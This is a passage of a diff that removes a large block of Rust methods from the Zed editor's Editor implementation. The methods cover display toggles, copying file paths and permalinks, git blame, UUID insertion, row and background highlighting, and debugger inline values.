self.display_map.update(cx, |map, cx| { - map.set_font( - style.text.font(), - style.text.font_size.to_pixels(rem_size), - cx, - ) - }); - self.style = Some(style); - } - - pub fn style(&self) -> Option<&EditorStyle> { - self.style.as_ref() - } - - // Called by the element. This method is not designed to be called outside of the editor - // element's layout code because it does not notify when rewrapping is computed synchronously. 
- pub(crate) fn set_wrap_width(&self, width: Option, cx: &mut App) -> bool { - self.display_map - .update(cx, |map, cx| map.set_wrap_width(width, cx)) - } - - pub fn set_soft_wrap(&mut self) { - self.soft_wrap_mode_override = Some(language_settings::SoftWrap::EditorWidth) - } - - pub fn toggle_soft_wrap(&mut self, _: &ToggleSoftWrap, _: &mut Window, cx: &mut Context) { - if self.soft_wrap_mode_override.is_some() { - self.soft_wrap_mode_override.take(); - } else { - let soft_wrap = match self.soft_wrap_mode(cx) { - SoftWrap::GitDiff => return, - SoftWrap::None => language_settings::SoftWrap::EditorWidth, - SoftWrap::EditorWidth | SoftWrap::Column(_) | SoftWrap::Bounded(_) => { - language_settings::SoftWrap::None - } - }; - self.soft_wrap_mode_override = Some(soft_wrap); - } - cx.notify(); - } - - pub fn toggle_tab_bar(&mut self, _: &ToggleTabBar, _: &mut Window, cx: &mut Context) { - let Some(workspace) = self.workspace() else { - return; - }; - let fs = workspace.read(cx).app_state().fs.clone(); - let current_show = TabBarSettings::get_global(cx).show; - update_settings_file::(fs, cx, move |setting, _| { - setting.show = Some(!current_show); - }); - } - - pub fn toggle_indent_guides( - &mut self, - _: &ToggleIndentGuides, - _: &mut Window, - cx: &mut Context, - ) { - let currently_enabled = self.should_show_indent_guides().unwrap_or_else(|| { - self.buffer - .read(cx) - .language_settings(cx) - .indent_guides - .enabled - }); - self.show_indent_guides = Some(!currently_enabled); - cx.notify(); - } - - fn should_show_indent_guides(&self) -> Option { - self.show_indent_guides - } - - pub fn toggle_line_numbers( - &mut self, - _: &ToggleLineNumbers, - _: &mut Window, - cx: &mut Context, - ) { - let mut editor_settings = EditorSettings::get_global(cx).clone(); - editor_settings.gutter.line_numbers = !editor_settings.gutter.line_numbers; - EditorSettings::override_global(editor_settings, cx); - } - - pub fn line_numbers_enabled(&self, cx: &App) -> bool { - if let 
Some(show_line_numbers) = self.show_line_numbers { - return show_line_numbers; - } - EditorSettings::get_global(cx).gutter.line_numbers - } - - pub fn should_use_relative_line_numbers(&self, cx: &mut App) -> bool { - self.use_relative_line_numbers - .unwrap_or(EditorSettings::get_global(cx).relative_line_numbers) - } - - pub fn toggle_relative_line_numbers( - &mut self, - _: &ToggleRelativeLineNumbers, - _: &mut Window, - cx: &mut Context, - ) { - let is_relative = self.should_use_relative_line_numbers(cx); - self.set_relative_line_number(Some(!is_relative), cx) - } - - pub fn set_relative_line_number(&mut self, is_relative: Option, cx: &mut Context) { - self.use_relative_line_numbers = is_relative; - cx.notify(); - } - - pub fn set_show_gutter(&mut self, show_gutter: bool, cx: &mut Context) { - self.show_gutter = show_gutter; - cx.notify(); - } - - pub fn set_show_scrollbars(&mut self, show_scrollbars: bool, cx: &mut Context) { - self.show_scrollbars = show_scrollbars; - cx.notify(); - } - - pub fn disable_scrolling(&mut self, cx: &mut Context) { - self.disable_scrolling = true; - cx.notify(); - } - - pub fn set_show_line_numbers(&mut self, show_line_numbers: bool, cx: &mut Context) { - self.show_line_numbers = Some(show_line_numbers); - cx.notify(); - } - - pub fn disable_expand_excerpt_buttons(&mut self, cx: &mut Context) { - self.disable_expand_excerpt_buttons = true; - cx.notify(); - } - - pub fn set_show_git_diff_gutter(&mut self, show_git_diff_gutter: bool, cx: &mut Context) { - self.show_git_diff_gutter = Some(show_git_diff_gutter); - cx.notify(); - } - - pub fn set_show_code_actions(&mut self, show_code_actions: bool, cx: &mut Context) { - self.show_code_actions = Some(show_code_actions); - cx.notify(); - } - - pub fn set_show_runnables(&mut self, show_runnables: bool, cx: &mut Context) { - self.show_runnables = Some(show_runnables); - cx.notify(); - } - - pub fn set_show_breakpoints(&mut self, show_breakpoints: bool, cx: &mut Context) { - 
self.show_breakpoints = Some(show_breakpoints); - cx.notify(); - } - - pub fn set_masked(&mut self, masked: bool, cx: &mut Context) { - if self.display_map.read(cx).masked != masked { - self.display_map.update(cx, |map, _| map.masked = masked); - } - cx.notify() - } - - pub fn set_show_wrap_guides(&mut self, show_wrap_guides: bool, cx: &mut Context) { - self.show_wrap_guides = Some(show_wrap_guides); - cx.notify(); - } - - pub fn set_show_indent_guides(&mut self, show_indent_guides: bool, cx: &mut Context) { - self.show_indent_guides = Some(show_indent_guides); - cx.notify(); - } - - pub fn working_directory(&self, cx: &App) -> Option { - if let Some(buffer) = self.buffer().read(cx).as_singleton() { - if let Some(file) = buffer.read(cx).file().and_then(|f| f.as_local()) { - if let Some(dir) = file.abs_path(cx).parent() { - return Some(dir.to_owned()); - } - } - - if let Some(project_path) = buffer.read(cx).project_path(cx) { - return Some(project_path.path.to_path_buf()); - } - } - - None - } - - fn target_file<'a>(&self, cx: &'a App) -> Option<&'a dyn language::LocalFile> { - self.active_excerpt(cx)? 
- .1 - .read(cx) - .file() - .and_then(|f| f.as_local()) - } - - pub fn target_file_abs_path(&self, cx: &mut Context) -> Option { - self.active_excerpt(cx).and_then(|(_, buffer, _)| { - let buffer = buffer.read(cx); - if let Some(project_path) = buffer.project_path(cx) { - let project = self.project.as_ref()?.read(cx); - project.absolute_path(&project_path, cx) - } else { - buffer - .file() - .and_then(|file| file.as_local().map(|file| file.abs_path(cx))) - } - }) - } - - fn target_file_path(&self, cx: &mut Context) -> Option { - self.active_excerpt(cx).and_then(|(_, buffer, _)| { - let project_path = buffer.read(cx).project_path(cx)?; - let project = self.project.as_ref()?.read(cx); - let entry = project.entry_for_path(&project_path, cx)?; - let path = entry.path.to_path_buf(); - Some(path) - }) - } - - pub fn reveal_in_finder( - &mut self, - _: &RevealInFileManager, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(target) = self.target_file(cx) { - cx.reveal_path(&target.abs_path(cx)); - } - } - - pub fn copy_path( - &mut self, - _: &zed_actions::workspace::CopyPath, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(path) = self.target_file_abs_path(cx) { - if let Some(path) = path.to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(path.to_string())); - } - } - } - - pub fn copy_relative_path( - &mut self, - _: &zed_actions::workspace::CopyRelativePath, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(path) = self.target_file_path(cx) { - if let Some(path) = path.to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(path.to_string())); - } - } - } - - pub fn project_path(&self, cx: &App) -> Option { - if let Some(buffer) = self.buffer.read(cx).as_singleton() { - buffer.read(cx).project_path(cx) - } else { - None - } - } - - // Returns true if the editor handled a go-to-line request - pub fn go_to_active_debug_line(&mut self, window: &mut Window, cx: &mut Context) -> bool { - maybe!({ - let 
breakpoint_store = self.breakpoint_store.as_ref()?; - - let Some(active_stack_frame) = breakpoint_store.read(cx).active_position().cloned() - else { - self.clear_row_highlights::(); - return None; - }; - - let position = active_stack_frame.position; - let buffer_id = position.buffer_id?; - let snapshot = self - .project - .as_ref()? - .read(cx) - .buffer_for_id(buffer_id, cx)? - .read(cx) - .snapshot(); - - let mut handled = false; - for (id, ExcerptRange { context, .. }) in - self.buffer.read(cx).excerpts_for_buffer(buffer_id, cx) - { - if context.start.cmp(&position, &snapshot).is_ge() - || context.end.cmp(&position, &snapshot).is_lt() - { - continue; - } - let snapshot = self.buffer.read(cx).snapshot(cx); - let multibuffer_anchor = snapshot.anchor_in_excerpt(id, position)?; - - handled = true; - self.clear_row_highlights::(); - self.go_to_line::( - multibuffer_anchor, - Some(cx.theme().colors().editor_debugger_active_line_background), - window, - cx, - ); - - cx.notify(); - } - - handled.then_some(()) - }) - .is_some() - } - - pub fn copy_file_name_without_extension( - &mut self, - _: &CopyFileNameWithoutExtension, - _: &mut Window, - cx: &mut Context, - ) { - if let Some(file) = self.target_file(cx) { - if let Some(file_stem) = file.path().file_stem() { - if let Some(name) = file_stem.to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(name.to_string())); - } - } - } - } - - pub fn copy_file_name(&mut self, _: &CopyFileName, _: &mut Window, cx: &mut Context) { - if let Some(file) = self.target_file(cx) { - if let Some(file_name) = file.path().file_name() { - if let Some(name) = file_name.to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(name.to_string())); - } - } - } - } - - pub fn toggle_git_blame( - &mut self, - _: &::git::Blame, - window: &mut Window, - cx: &mut Context, - ) { - self.show_git_blame_gutter = !self.show_git_blame_gutter; - - if self.show_git_blame_gutter && !self.has_blame_entries(cx) { - self.start_git_blame(true, window, 
cx); - } - - cx.notify(); - } - - pub fn toggle_git_blame_inline( - &mut self, - _: &ToggleGitBlameInline, - window: &mut Window, - cx: &mut Context, - ) { - self.toggle_git_blame_inline_internal(true, window, cx); - cx.notify(); - } - - pub fn open_git_blame_commit( - &mut self, - _: &OpenGitBlameCommit, - window: &mut Window, - cx: &mut Context, - ) { - self.open_git_blame_commit_internal(window, cx); - } - - fn open_git_blame_commit_internal( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> Option<()> { - let blame = self.blame.as_ref()?; - let snapshot = self.snapshot(window, cx); - let cursor = self.selections.newest::(cx).head(); - let (buffer, point, _) = snapshot.buffer_snapshot.point_to_buffer_point(cursor)?; - let blame_entry = blame - .update(cx, |blame, cx| { - blame - .blame_for_rows( - &[RowInfo { - buffer_id: Some(buffer.remote_id()), - buffer_row: Some(point.row), - ..Default::default() - }], - cx, - ) - .next() - }) - .flatten()?; - let renderer = cx.global::().0.clone(); - let repo = blame.read(cx).repository(cx)?; - let workspace = self.workspace()?.downgrade(); - renderer.open_blame_commit(blame_entry, repo, workspace, window, cx); - None - } - - pub fn git_blame_inline_enabled(&self) -> bool { - self.git_blame_inline_enabled - } - - pub fn toggle_selection_menu( - &mut self, - _: &ToggleSelectionMenu, - _: &mut Window, - cx: &mut Context, - ) { - self.show_selection_menu = self - .show_selection_menu - .map(|show_selections_menu| !show_selections_menu) - .or_else(|| Some(!EditorSettings::get_global(cx).toolbar.selections_menu)); - - cx.notify(); - } - - pub fn selection_menu_enabled(&self, cx: &App) -> bool { - self.show_selection_menu - .unwrap_or_else(|| EditorSettings::get_global(cx).toolbar.selections_menu) - } - - fn start_git_blame( - &mut self, - user_triggered: bool, - window: &mut Window, - cx: &mut Context, - ) { - if let Some(project) = self.project.as_ref() { - let Some(buffer) = self.buffer().read(cx).as_singleton() 
else { - return; - }; - - if buffer.read(cx).file().is_none() { - return; - } - - let focused = self.focus_handle(cx).contains_focused(window, cx); - - let project = project.clone(); - let blame = cx.new(|cx| GitBlame::new(buffer, project, user_triggered, focused, cx)); - self.blame_subscription = - Some(cx.observe_in(&blame, window, |_, _, _, cx| cx.notify())); - self.blame = Some(blame); - } - } - - fn toggle_git_blame_inline_internal( - &mut self, - user_triggered: bool, - window: &mut Window, - cx: &mut Context, - ) { - if self.git_blame_inline_enabled { - self.git_blame_inline_enabled = false; - self.show_git_blame_inline = false; - self.show_git_blame_inline_delay_task.take(); - } else { - self.git_blame_inline_enabled = true; - self.start_git_blame_inline(user_triggered, window, cx); - } - - cx.notify(); - } - - fn start_git_blame_inline( - &mut self, - user_triggered: bool, - window: &mut Window, - cx: &mut Context, - ) { - self.start_git_blame(user_triggered, window, cx); - - if ProjectSettings::get_global(cx) - .git - .inline_blame_delay() - .is_some() - { - self.start_inline_blame_timer(window, cx); - } else { - self.show_git_blame_inline = true - } - } - - pub fn blame(&self) -> Option<&Entity> { - self.blame.as_ref() - } - - pub fn show_git_blame_gutter(&self) -> bool { - self.show_git_blame_gutter - } - - pub fn render_git_blame_gutter(&self, cx: &App) -> bool { - self.show_git_blame_gutter && self.has_blame_entries(cx) - } - - pub fn render_git_blame_inline(&self, window: &Window, cx: &App) -> bool { - self.show_git_blame_inline - && (self.focus_handle.is_focused(window) || self.inline_blame_popover.is_some()) - && !self.newest_selection_head_on_empty_line(cx) - && self.has_blame_entries(cx) - } - - fn has_blame_entries(&self, cx: &App) -> bool { - self.blame() - .map_or(false, |blame| blame.read(cx).has_generated_entries()) - } - - fn newest_selection_head_on_empty_line(&self, cx: &App) -> bool { - let cursor_anchor = 
self.selections.newest_anchor().head(); - - let snapshot = self.buffer.read(cx).snapshot(cx); - let buffer_row = MultiBufferRow(cursor_anchor.to_point(&snapshot).row); - - snapshot.line_len(buffer_row) == 0 - } - - fn get_permalink_to_line(&self, cx: &mut Context) -> Task> { - let buffer_and_selection = maybe!({ - let selection = self.selections.newest::(cx); - let selection_range = selection.range(); - - let multi_buffer = self.buffer().read(cx); - let multi_buffer_snapshot = multi_buffer.snapshot(cx); - let buffer_ranges = multi_buffer_snapshot.range_to_buffer_ranges(selection_range); - - let (buffer, range, _) = if selection.reversed { - buffer_ranges.first() - } else { - buffer_ranges.last() - }?; - - let selection = text::ToPoint::to_point(&range.start, &buffer).row - ..text::ToPoint::to_point(&range.end, &buffer).row; - Some(( - multi_buffer.buffer(buffer.remote_id()).unwrap().clone(), - selection, - )) - }); - - let Some((buffer, selection)) = buffer_and_selection else { - return Task::ready(Err(anyhow!("failed to determine buffer and selection"))); - }; - - let Some(project) = self.project.as_ref() else { - return Task::ready(Err(anyhow!("editor does not have project"))); - }; - - project.update(cx, |project, cx| { - project.get_permalink_to_line(&buffer, selection, cx) - }) - } - - pub fn copy_permalink_to_line( - &mut self, - _: &CopyPermalinkToLine, - window: &mut Window, - cx: &mut Context, - ) { - let permalink_task = self.get_permalink_to_line(cx); - let workspace = self.workspace(); - - cx.spawn_in(window, async move |_, cx| match permalink_task.await { - Ok(permalink) => { - cx.update(|_, cx| { - cx.write_to_clipboard(ClipboardItem::new_string(permalink.to_string())); - }) - .ok(); - } - Err(err) => { - let message = format!("Failed to copy permalink: {err}"); - - anyhow::Result::<()>::Err(err).log_err(); - - if let Some(workspace) = workspace { - workspace - .update_in(cx, |workspace, _, cx| { - struct CopyPermalinkToLine; - - workspace.show_toast( 
- Toast::new( - NotificationId::unique::(), - message, - ), - cx, - ) - }) - .ok(); - } - } - }) - .detach(); - } - - pub fn copy_file_location( - &mut self, - _: &CopyFileLocation, - _: &mut Window, - cx: &mut Context, - ) { - let selection = self.selections.newest::(cx).start.row + 1; - if let Some(file) = self.target_file(cx) { - if let Some(path) = file.path().to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(format!("{path}:{selection}"))); - } - } - } - - pub fn open_permalink_to_line( - &mut self, - _: &OpenPermalinkToLine, - window: &mut Window, - cx: &mut Context, - ) { - let permalink_task = self.get_permalink_to_line(cx); - let workspace = self.workspace(); - - cx.spawn_in(window, async move |_, cx| match permalink_task.await { - Ok(permalink) => { - cx.update(|_, cx| { - cx.open_url(permalink.as_ref()); - }) - .ok(); - } - Err(err) => { - let message = format!("Failed to open permalink: {err}"); - - anyhow::Result::<()>::Err(err).log_err(); - - if let Some(workspace) = workspace { - workspace - .update(cx, |workspace, cx| { - struct OpenPermalinkToLine; - - workspace.show_toast( - Toast::new( - NotificationId::unique::(), - message, - ), - cx, - ) - }) - .ok(); - } - } - }) - .detach(); - } - - pub fn insert_uuid_v4( - &mut self, - _: &InsertUuidV4, - window: &mut Window, - cx: &mut Context, - ) { - self.insert_uuid(UuidVersion::V4, window, cx); - } - - pub fn insert_uuid_v7( - &mut self, - _: &InsertUuidV7, - window: &mut Window, - cx: &mut Context, - ) { - self.insert_uuid(UuidVersion::V7, window, cx); - } - - fn insert_uuid(&mut self, version: UuidVersion, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - let edits = this - .selections - .all::(cx) - .into_iter() - .map(|selection| { - let uuid = match version { - UuidVersion::V4 => uuid::Uuid::new_v4(), - UuidVersion::V7 => uuid::Uuid::now_v7(), - }; - - (selection.range(), 
uuid.to_string()) - }); - this.edit(edits, cx); - this.refresh_inline_completion(true, false, window, cx); - }); - } - - pub fn open_selections_in_multibuffer( - &mut self, - _: &OpenSelectionsInMultibuffer, - window: &mut Window, - cx: &mut Context, - ) { - let multibuffer = self.buffer.read(cx); - - let Some(buffer) = multibuffer.as_singleton() else { - return; - }; - - let Some(workspace) = self.workspace() else { - return; - }; - - let locations = self - .selections - .disjoint_anchors() - .iter() - .map(|range| Location { - buffer: buffer.clone(), - range: range.start.text_anchor..range.end.text_anchor, - }) - .collect::>(); - - let title = multibuffer.title(cx).to_string(); - - cx.spawn_in(window, async move |_, cx| { - workspace.update_in(cx, |workspace, window, cx| { - Self::open_locations_in_multibuffer( - workspace, - locations, - format!("Selections for '{title}'"), - false, - MultibufferSelectionMode::All, - window, - cx, - ); - }) - }) - .detach(); - } - - /// Adds a row highlight for the given range. If a row has multiple highlights, the - /// last highlight added will be used. - /// - /// If the range ends at the beginning of a line, then that line will not be highlighted. - pub fn highlight_rows( - &mut self, - range: Range, - color: Hsla, - options: RowHighlightOptions, - cx: &mut Context, - ) { - let snapshot = self.buffer().read(cx).snapshot(cx); - let row_highlights = self.highlighted_rows.entry(TypeId::of::()).or_default(); - let ix = row_highlights.binary_search_by(|highlight| { - Ordering::Equal - .then_with(|| highlight.range.start.cmp(&range.start, &snapshot)) - .then_with(|| highlight.range.end.cmp(&range.end, &snapshot)) - }); - - if let Err(mut ix) = ix { - let index = post_inc(&mut self.highlight_order); - - // If this range intersects with the preceding highlight, then merge it with - // the preceding highlight. Otherwise insert a new highlight. 
- let mut merged = false; - if ix > 0 { - let prev_highlight = &mut row_highlights[ix - 1]; - if prev_highlight - .range - .end - .cmp(&range.start, &snapshot) - .is_ge() - { - ix -= 1; - if prev_highlight.range.end.cmp(&range.end, &snapshot).is_lt() { - prev_highlight.range.end = range.end; - } - merged = true; - prev_highlight.index = index; - prev_highlight.color = color; - prev_highlight.options = options; - } - } - - if !merged { - row_highlights.insert( - ix, - RowHighlight { - range: range.clone(), - index, - color, - options, - type_id: TypeId::of::(), - }, - ); - } - - // If any of the following highlights intersect with this one, merge them. - while let Some(next_highlight) = row_highlights.get(ix + 1) { - let highlight = &row_highlights[ix]; - if next_highlight - .range - .start - .cmp(&highlight.range.end, &snapshot) - .is_le() - { - if next_highlight - .range - .end - .cmp(&highlight.range.end, &snapshot) - .is_gt() - { - row_highlights[ix].range.end = next_highlight.range.end; - } - row_highlights.remove(ix + 1); - } else { - break; - } - } - } - } - - /// Remove any highlighted row ranges of the given type that intersect the - /// given ranges. 
- pub fn remove_highlighted_rows( - &mut self, - ranges_to_remove: Vec>, - cx: &mut Context, - ) { - let snapshot = self.buffer().read(cx).snapshot(cx); - let row_highlights = self.highlighted_rows.entry(TypeId::of::()).or_default(); - let mut ranges_to_remove = ranges_to_remove.iter().peekable(); - row_highlights.retain(|highlight| { - while let Some(range_to_remove) = ranges_to_remove.peek() { - match range_to_remove.end.cmp(&highlight.range.start, &snapshot) { - Ordering::Less | Ordering::Equal => { - ranges_to_remove.next(); - } - Ordering::Greater => { - match range_to_remove.start.cmp(&highlight.range.end, &snapshot) { - Ordering::Less | Ordering::Equal => { - return false; - } - Ordering::Greater => break, - } - } - } - } - - true - }) - } - - /// Clear all anchor ranges for a certain highlight context type, so no corresponding rows will be highlighted. - pub fn clear_row_highlights(&mut self) { - self.highlighted_rows.remove(&TypeId::of::()); - } - - /// For a highlight given context type, gets all anchor ranges that will be used for row highlighting. - pub fn highlighted_rows(&self) -> impl '_ + Iterator, Hsla)> { - self.highlighted_rows - .get(&TypeId::of::()) - .map_or(&[] as &[_], |vec| vec.as_slice()) - .iter() - .map(|highlight| (highlight.range.clone(), highlight.color)) - } - - /// Merges all anchor ranges for all context types ever set, picking the last highlight added in case of a row conflict. - /// Returns a map of display rows that are highlighted and their corresponding highlight color. - /// Allows to ignore certain kinds of highlights. 
- pub fn highlighted_display_rows( - &self, - window: &mut Window, - cx: &mut App, - ) -> BTreeMap { - let snapshot = self.snapshot(window, cx); - let mut used_highlight_orders = HashMap::default(); - self.highlighted_rows - .iter() - .flat_map(|(_, highlighted_rows)| highlighted_rows.iter()) - .fold( - BTreeMap::::new(), - |mut unique_rows, highlight| { - let start = highlight.range.start.to_display_point(&snapshot); - let end = highlight.range.end.to_display_point(&snapshot); - let start_row = start.row().0; - let end_row = if highlight.range.end.text_anchor != text::Anchor::MAX - && end.column() == 0 - { - end.row().0.saturating_sub(1) - } else { - end.row().0 - }; - for row in start_row..=end_row { - let used_index = - used_highlight_orders.entry(row).or_insert(highlight.index); - if highlight.index >= *used_index { - *used_index = highlight.index; - unique_rows.insert( - DisplayRow(row), - LineHighlight { - include_gutter: highlight.options.include_gutter, - border: None, - background: highlight.color.into(), - type_id: Some(highlight.type_id), - }, - ); - } - } - unique_rows - }, - ) - } - - pub fn highlighted_display_row_for_autoscroll( - &self, - snapshot: &DisplaySnapshot, - ) -> Option { - self.highlighted_rows - .values() - .flat_map(|highlighted_rows| highlighted_rows.iter()) - .filter_map(|highlight| { - if highlight.options.autoscroll { - Some(highlight.range.start.to_display_point(snapshot).row()) - } else { - None - } - }) - .min() - } - - pub fn set_search_within_ranges(&mut self, ranges: &[Range], cx: &mut Context) { - self.highlight_background::( - ranges, - |colors| colors.editor_document_highlight_read_background, - cx, - ) - } - - pub fn set_breadcrumb_header(&mut self, new_header: String) { - self.breadcrumb_header = Some(new_header); - } - - pub fn clear_search_within_ranges(&mut self, cx: &mut Context) { - self.clear_background_highlights::(cx); - } - - pub fn highlight_background( - &mut self, - ranges: &[Range], - color_fetcher: 
fn(&ThemeColors) -> Hsla, - cx: &mut Context, - ) { - self.background_highlights - .insert(TypeId::of::(), (color_fetcher, Arc::from(ranges))); - self.scrollbar_marker_state.dirty = true; - cx.notify(); - } - - pub fn clear_background_highlights( - &mut self, - cx: &mut Context, - ) -> Option { - let text_highlights = self.background_highlights.remove(&TypeId::of::())?; - if !text_highlights.1.is_empty() { - self.scrollbar_marker_state.dirty = true; - cx.notify(); - } - Some(text_highlights) - } - - pub fn highlight_gutter( - &mut self, - ranges: &[Range], - color_fetcher: fn(&App) -> Hsla, - cx: &mut Context, - ) { - self.gutter_highlights - .insert(TypeId::of::(), (color_fetcher, Arc::from(ranges))); - cx.notify(); - } - - pub fn clear_gutter_highlights( - &mut self, - cx: &mut Context, - ) -> Option { - cx.notify(); - self.gutter_highlights.remove(&TypeId::of::()) - } - - #[cfg(feature = "test-support")] - pub fn all_text_background_highlights( - &self, - window: &mut Window, - cx: &mut Context, - ) -> Vec<(Range, Hsla)> { - let snapshot = self.snapshot(window, cx); - let buffer = &snapshot.buffer_snapshot; - let start = buffer.anchor_before(0); - let end = buffer.anchor_after(buffer.len()); - let theme = cx.theme().colors(); - self.background_highlights_in_range(start..end, &snapshot, theme) - } - - #[cfg(feature = "test-support")] - pub fn search_background_highlights(&mut self, cx: &mut Context) -> Vec> { - let snapshot = self.buffer().read(cx).snapshot(cx); - - let highlights = self - .background_highlights - .get(&TypeId::of::()); - - if let Some((_color, ranges)) = highlights { - ranges - .iter() - .map(|range| range.start.to_point(&snapshot)..range.end.to_point(&snapshot)) - .collect_vec() - } else { - vec![] - } - } - - fn document_highlights_for_position<'a>( - &'a self, - position: Anchor, - buffer: &'a MultiBufferSnapshot, - ) -> impl 'a + Iterator> { - let read_highlights = self - .background_highlights - .get(&TypeId::of::()) - .map(|h| &h.1); - let 
write_highlights = self - .background_highlights - .get(&TypeId::of::()) - .map(|h| &h.1); - let left_position = position.bias_left(buffer); - let right_position = position.bias_right(buffer); - read_highlights - .into_iter() - .chain(write_highlights) - .flat_map(move |ranges| { - let start_ix = match ranges.binary_search_by(|probe| { - let cmp = probe.end.cmp(&left_position, buffer); - if cmp.is_ge() { - Ordering::Greater - } else { - Ordering::Less - } - }) { - Ok(i) | Err(i) => i, - }; - - ranges[start_ix..] - .iter() - .take_while(move |range| range.start.cmp(&right_position, buffer).is_le()) - }) - } - - pub fn has_background_highlights(&self) -> bool { - self.background_highlights - .get(&TypeId::of::()) - .map_or(false, |(_, highlights)| !highlights.is_empty()) - } - - pub fn background_highlights_in_range( - &self, - search_range: Range, - display_snapshot: &DisplaySnapshot, - theme: &ThemeColors, - ) -> Vec<(Range, Hsla)> { - let mut results = Vec::new(); - for (color_fetcher, ranges) in self.background_highlights.values() { - let color = color_fetcher(theme); - let start_ix = match ranges.binary_search_by(|probe| { - let cmp = probe - .end - .cmp(&search_range.start, &display_snapshot.buffer_snapshot); - if cmp.is_gt() { - Ordering::Greater - } else { - Ordering::Less - } - }) { - Ok(i) | Err(i) => i, - }; - for range in &ranges[start_ix..] 
{ - if range - .start - .cmp(&search_range.end, &display_snapshot.buffer_snapshot) - .is_ge() - { - break; - } - - let start = range.start.to_display_point(display_snapshot); - let end = range.end.to_display_point(display_snapshot); - results.push((start..end, color)) - } - } - results - } - - pub fn background_highlight_row_ranges( - &self, - search_range: Range, - display_snapshot: &DisplaySnapshot, - count: usize, - ) -> Vec> { - let mut results = Vec::new(); - let Some((_, ranges)) = self.background_highlights.get(&TypeId::of::()) else { - return vec![]; - }; - - let start_ix = match ranges.binary_search_by(|probe| { - let cmp = probe - .end - .cmp(&search_range.start, &display_snapshot.buffer_snapshot); - if cmp.is_gt() { - Ordering::Greater - } else { - Ordering::Less - } - }) { - Ok(i) | Err(i) => i, - }; - let mut push_region = |start: Option, end: Option| { - if let (Some(start_display), Some(end_display)) = (start, end) { - results.push( - start_display.to_display_point(display_snapshot) - ..=end_display.to_display_point(display_snapshot), - ); - } - }; - let mut start_row: Option = None; - let mut end_row: Option = None; - if ranges.len() > count { - return Vec::new(); - } - for range in &ranges[start_ix..] { - if range - .start - .cmp(&search_range.end, &display_snapshot.buffer_snapshot) - .is_ge() - { - break; - } - let end = range.end.to_point(&display_snapshot.buffer_snapshot); - if let Some(current_row) = &end_row { - if end.row == current_row.row { - continue; - } - } - let start = range.start.to_point(&display_snapshot.buffer_snapshot); - if start_row.is_none() { - assert_eq!(end_row, None); - start_row = Some(start); - end_row = Some(end); - continue; - } - if let Some(current_end) = end_row.as_mut() { - if start.row > current_end.row + 1 { - push_region(start_row, end_row); - start_row = Some(start); - end_row = Some(end); - } else { - // Merge two hunks. 
- *current_end = end; - } - } else { - unreachable!(); - } - } - // We might still have a hunk that was not rendered (if there was a search hit on the last line) - push_region(start_row, end_row); - results - } - - pub fn gutter_highlights_in_range( - &self, - search_range: Range, - display_snapshot: &DisplaySnapshot, - cx: &App, - ) -> Vec<(Range, Hsla)> { - let mut results = Vec::new(); - for (color_fetcher, ranges) in self.gutter_highlights.values() { - let color = color_fetcher(cx); - let start_ix = match ranges.binary_search_by(|probe| { - let cmp = probe - .end - .cmp(&search_range.start, &display_snapshot.buffer_snapshot); - if cmp.is_gt() { - Ordering::Greater - } else { - Ordering::Less - } - }) { - Ok(i) | Err(i) => i, - }; - for range in &ranges[start_ix..] { - if range - .start - .cmp(&search_range.end, &display_snapshot.buffer_snapshot) - .is_ge() - { - break; - } - - let start = range.start.to_display_point(display_snapshot); - let end = range.end.to_display_point(display_snapshot); - results.push((start..end, color)) - } - } - results - } - - /// Get the text ranges corresponding to the redaction query - pub fn redacted_ranges( - &self, - search_range: Range, - display_snapshot: &DisplaySnapshot, - cx: &App, - ) -> Vec> { - display_snapshot - .buffer_snapshot - .redacted_ranges(search_range, |file| { - if let Some(file) = file { - file.is_private() - && EditorSettings::get( - Some(SettingsLocation { - worktree_id: file.worktree_id(cx), - path: file.path().as_ref(), - }), - cx, - ) - .redact_private_values - } else { - false - } - }) - .map(|range| { - range.start.to_display_point(display_snapshot) - ..range.end.to_display_point(display_snapshot) - }) - .collect() - } - - pub fn highlight_text( - &mut self, - ranges: Vec>, - style: HighlightStyle, - cx: &mut Context, - ) { - self.display_map.update(cx, |map, _| { - map.highlight_text(TypeId::of::(), ranges, style) - }); - cx.notify(); - } - - pub(crate) fn highlight_inlays( - &mut self, - highlights: 
Vec, - style: HighlightStyle, - cx: &mut Context, - ) { - self.display_map.update(cx, |map, _| { - map.highlight_inlays(TypeId::of::(), highlights, style) - }); - cx.notify(); - } - - pub fn text_highlights<'a, T: 'static>( - &'a self, - cx: &'a App, - ) -> Option<(HighlightStyle, &'a [Range])> { - self.display_map.read(cx).text_highlights(TypeId::of::()) - } - - pub fn clear_highlights(&mut self, cx: &mut Context) { - let cleared = self - .display_map - .update(cx, |map, _| map.clear_highlights(TypeId::of::())); - if cleared { - cx.notify(); - } - } - - pub fn show_local_cursors(&self, window: &mut Window, cx: &mut App) -> bool { - (self.read_only(cx) || self.blink_manager.read(cx).visible()) - && self.focus_handle.is_focused(window) - } - - pub fn set_show_cursor_when_unfocused(&mut self, is_enabled: bool, cx: &mut Context) { - self.show_cursor_when_unfocused = is_enabled; - cx.notify(); - } - - fn on_buffer_changed(&mut self, _: Entity, cx: &mut Context) { - cx.notify(); - } - - fn on_debug_session_event( - &mut self, - _session: Entity, - event: &SessionEvent, - cx: &mut Context, - ) { - match event { - SessionEvent::InvalidateInlineValue => { - self.refresh_inline_values(cx); - } - _ => {} - } - } - - fn refresh_inline_values(&mut self, cx: &mut Context) { - let Some(project) = self.project.clone() else { - return; - }; - let Some(buffer) = self.buffer.read(cx).as_singleton() else { - return; - }; - if !self.inline_value_cache.enabled { - let inlays = std::mem::take(&mut self.inline_value_cache.inlays); - self.splice_inlays(&inlays, Vec::new(), cx); - return; - } - - let current_execution_position = self - .highlighted_rows - .get(&TypeId::of::()) - .and_then(|lines| lines.last().map(|line| line.range.start)); - - self.inline_value_cache.refresh_task = cx.spawn(async move |editor, cx| { - let snapshot = editor - .update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) - .ok()?; - - let inline_values = editor - .update(cx, |_, cx| { - let 
